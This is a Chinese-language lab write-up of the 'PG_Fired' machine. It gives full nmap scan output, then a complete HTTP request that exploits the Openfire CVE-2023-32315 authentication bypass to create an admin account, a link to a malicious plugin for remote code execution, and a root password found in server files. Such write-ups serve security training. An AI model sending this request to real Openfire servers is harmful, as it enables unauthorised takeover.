信息收集:
root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.96
Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-24 20:13 CST
Nmap scan report for 192.168.216.96
Host is up (0.0029s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
9090/tcp open zeus-admin?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 24 Feb 2025 12:14:56 GMT
| Last-Modified: Tue, 02 Aug 2022 12:04:43 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 24 Feb 2025 12:15:01 GMT
| Allow: GET,HEAD,POST,OPTIONS
| JavaRMI, drda, ibm-db2-das, informix:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| SqueezeCenter_CLI:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| WMSRequest:
| HTTP/1.1 400 Illegal character CNTL=0x1
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open ssl/xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 24 Feb 2025 12:15:12 GMT
| Last-Modified: Tue, 02 Aug 2022 12:04:43 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 24 Feb 2025 12:15:12 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=localhost
| Subject Alternative Name: DNS:localhost, DNS:*.localhost
| Not valid before: 2024-06-28T07:02:39
|_Not valid after: 2029-06-27T07:02:39
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port9090-TCP:V=7.80%I=7%D=2/24%Time=67BC62C0%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,11D,"HTTP/1.1x20200x20OKrnDate:x20Mon,x2024x20Febx202
SF:025x2012:14:56x20GMTrnLast-Modified:x20Tue,x2002x20Augx202022x
SF:2012:04:43x20GMTrnContent-Type:x20text/htmlrnAccept-Ranges:x20by
SF:tesrnContent-Length:x20115rnrn<html>n<head><title></title>n<me
SF:tax20http-equiv="refresh"x20content="0;URL=index.jsp">n</head>
SF:n<body>n</body>n</html>nn")%r(JavaRMI,C3,"HTTP/1.1x20400x20Illeg
SF:alx20characterx20CNTL=0x0rnContent-Type:x20text/html;charset=iso-8
SF:859-1rnContent-Length:x2069rnConnection:x20closernrn<h1>Badx
SF:20Messagex20400</h1><pre>reason:x20Illegalx20characterx20CNTL=0x0</
SF:pre>")%r(WMSRequest,C3,"HTTP/1.1x20400x20Illegalx20characterx20CNT
SF:L=0x1rnContent-Type:x20text/html;charset=iso-8859-1rnContent-Lengt
SF:h:x2069rnConnection:x20closernrn<h1>Badx20Messagex20400</h1><
SF:pre>reason:x20Illegalx20characterx20CNTL=0x1</pre>")%r(ibm-db2-das,C
SF:3,"HTTP/1.1x20400x20Illegalx20characterx20CNTL=0x0rnContent-Type
SF::x20text/html;charset=iso-8859-1rnContent-Length:x2069rnConnectio
SF:n:x20closernrn<h1>Badx20Messagex20400</h1><pre>reason:x20Illega
SF:lx20characterx20CNTL=0x0</pre>")%r(SqueezeCenter_CLI,9B,"HTTP/1.1x2
SF:0400x20Nox20URIrnContent-Type:x20text/html;charset=iso-8859-1rnC
SF:ontent-Length:x2049rnConnection:x20closernrn<h1>Badx20Message
SF:x20400</h1><pre>reason:x20Nox20URI</pre>")%r(informix,C3,"HTTP/1.1x
SF:20400x20Illegalx20characterx20CNTL=0x0rnContent-Type:x20text/html
SF:;charset=iso-8859-1rnContent-Length:x2069rnConnection:x20closer
SF:nrn<h1>Badx20Messagex20400</h1><pre>reason:x20Illegalx20character
SF:x20CNTL=0x0</pre>")%r(drda,C3,"HTTP/1.1x20400x20Illegalx20characte
SF:rx20CNTL=0x0rnContent-Type:x20text/html;charset=iso-8859-1rnConte
SF:nt-Length:x2069rnConnection:x20closernrn<h1>Badx20Messagex204
SF:00</h1><pre>reason:x20Illegalx20characterx20CNTL=0x0</pre>")%r(HTTPO
SF:ptions,56,"HTTP/1.1x20200x20OKrnDate:x20Mon,x2024x20Febx202025
SF:x2012:15:01x20GMTrnAllow:x20GET,HEAD,POST,OPTIONSrnrn");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port9091-TCP:V=7.80%T=SSL%I=7%D=2/24%Time=67BC62D0%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,11D,"HTTP/1.1x20200x20OKrnDate:x20Mon,x2024x20Fe
SF:bx202025x2012:15:12x20GMTrnLast-Modified:x20Tue,x2002x20Augx20
SF:2022x2012:04:43x20GMTrnContent-Type:x20text/htmlrnAccept-Ranges:
SF:x20bytesrnContent-Length:x20115rnrn<html>n<head><title></title
SF:>n<metax20http-equiv="refresh"x20content="0;URL=index.jsp">n</
SF:head>n<body>n</body>n</html>nn")%r(HTTPOptions,56,"HTTP/1.1x2020
SF:0x20OKrnDate:x20Mon,x2024x20Febx202025x2012:15:12x20GMTrnAll
SF:ow:x20GET,HEAD,POST,OPTIONSrnrn")%r(RTSPRequest,AD,"HTTP/1.1x205
SF:05x20Unknownx20VersionrnContent-Type:x20text/html;charset=iso-8859
SF:-1rnContent-Length:x2058rnConnection:x20closernrn<h1>Badx20M
SF:essagex20505</h1><pre>reason:x20Unknownx20Version</pre>")%r(RPCCheck
SF:,C7,"HTTP/1.1x20400x20Illegalx20characterx20OTEXT=0x80rnContent-
SF:Type:x20text/html;charset=iso-8859-1rnContent-Length:x2071rnConne
SF:ction:x20closernrn<h1>Badx20Messagex20400</h1><pre>reason:x20Il
SF:legalx20characterx20OTEXT=0x80</pre>")%r(DNSVersionBindReqTCP,C3,"HTT
SF:P/1.1x20400x20Illegalx20characterx20CNTL=0x0rnContent-Type:x20t
SF:ext/html;charset=iso-8859-1rnContent-Length:x2069rnConnection:x20
SF:closernrn<h1>Badx20Messagex20400</h1><pre>reason:x20Illegalx20c
SF:haracterx20CNTL=0x0</pre>")%r(DNSStatusRequestTCP,C3,"HTTP/1.1x20400
SF:x20Illegalx20characterx20CNTL=0x0rnContent-Type:x20text/html;char
SF:set=iso-8859-1rnContent-Length:x2069rnConnection:x20closernrn
SF:<h1>Badx20Messagex20400</h1><pre>reason:x20Illegalx20characterx20C
SF:NTL=0x0</pre>")%r(Help,9B,"HTTP/1.1x20400x20Nox20URIrnContent-Typ
SF:e:x20text/html;charset=iso-8859-1rnContent-Length:x2049rnConnecti
SF:on:x20closernrn<h1>Badx20Messagex20400</h1><pre>reason:x20Nox2
SF:0URI</pre>")%r(SSLSessionReq,C5,"HTTP/1.1x20400x20Illegalx20charact
SF:erx20CNTL=0x16rnContent-Type:x20text/html;charset=iso-8859-1rnCon
SF:tent-Length:x2070rnConnection:x20closernrn<h1>Badx20Messagex2
SF:0400</h1><pre>reason:x20Illegalx20characterx20CNTL=0x16</pre>");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.39 - 3.2 (86%), Infomir MAG-250 set-top box (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 1.92 ms 192.168.45.1
2 1.93 ms 192.168.45.254
3 2.65 ms 192.168.251.1
4 2.99 ms 192.168.216.96
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.23 seconds
开放了9090http和9091https服务,经过访问9091就是9090反向代理https服务,并且找到版本号Openfire, Version: 4.7.3
搜索版本信息发现一篇漏洞复现文章:https://www.cnblogs.com/fuchangjiang/p/17713984.html
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=admin123&name=&email=&password=admin123&passwordConfirm=admin123&isadmin=on&create=Create+User HTTP/1.1
Host: 192.168.216.96:9090
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Cookie: csrf=csrftoken
发送数据包添加用户密码:admin123/admin123
有个坑就是登录不进入,debug发现是index.jsp访问一直转圈,登录后会跳转到index.jsp,我这里直接通过数据包登录拿到cookie添加到浏览器,然后直接访问user-summary.jsp就出来东西了
上传插件:https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass
然后访问/profile-settings.jsp,点击(因为我点击最上面server没反应,有bug一直转圈
使用密码:123进入shell,成功RCE
成功拿到shell(反弹shell命令一个不行就一个一个试,玄学
拿到local
suid等常规信息收集无果,尝试上传iox搭建隧道看看这些端口服务
然而并没发现突破点,还试了一下PwnKit(CVE-2021-4034)也不行,看了hints,
别忘了翻一翻网站数据库!
进入网站目录/var/lib/openfire/
有log和script文件
log是我刚刚的登录网站的凭证信息等等,在script找到了icmp的凭证
尝试用该密码:OpenFireAtEveryone,切换root身份成功,拿到proof
原文始发于微信公众号(EuSRC安全实验室):PG_Fired
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论